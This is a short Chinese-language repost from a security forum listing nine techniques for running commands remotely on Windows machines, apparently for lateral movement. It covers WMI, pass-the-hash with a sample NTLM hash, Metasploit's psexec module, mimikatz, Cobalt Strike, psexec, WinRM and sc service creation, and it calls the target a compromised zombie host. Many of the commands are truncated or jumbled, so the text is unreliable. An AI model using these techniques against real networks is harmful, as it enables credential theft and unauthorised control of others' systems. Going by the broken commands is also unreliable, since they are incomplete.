Windows远程执行cmd命令的9种方法
Windows远程执行cmd命令的9种方法
一、远程执行命令方式及对应端口:
IPC$+AT 445
PSEXEC 445
WMI 135
Winrm 5985(HTTP)&5986(HTTPS)
二、9种远程执行cmd命令的方法:
1.WMI执行命令方式,无回显:
wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create
2.使用Hash直接登录Windows(HASH传递)
抓取windows hash值,得到administrator的hash:
598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
msf调用payload: use exploit/windows/smb/psexec show options
3. mimikatz传递hash方式连接+at计划任务执行命令:
mimikatz.exe privilege::debug
4.WMIcmd执行命令,有回显:
WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"
程序下载地址:
https://github.com/nccgroup/WMIcmd/releases
5.Cobalt strkie远程执行命令与hash传递攻击
6.psexec.exe远程执行命令
psexec /accepteula //接受许可协议 sc delete psexesvc psexec
7.psexec.vbs远程执行命令
cscript psexec.vbs
8.winrm远程执行命令
//肉机上面快速启动winrm服务,并绑定到5985端口: winrm quickconfig -q winrm
9.远程命令执行sc
//建立ipc连接(参见net use + at)后上传等待运行的bat或exe程序到目标系统上,创建服务(开启服务时会以system 权限在远程系统上执行程序):
net use
来源:先知社区
作者:roothex
如有侵权,请联系删除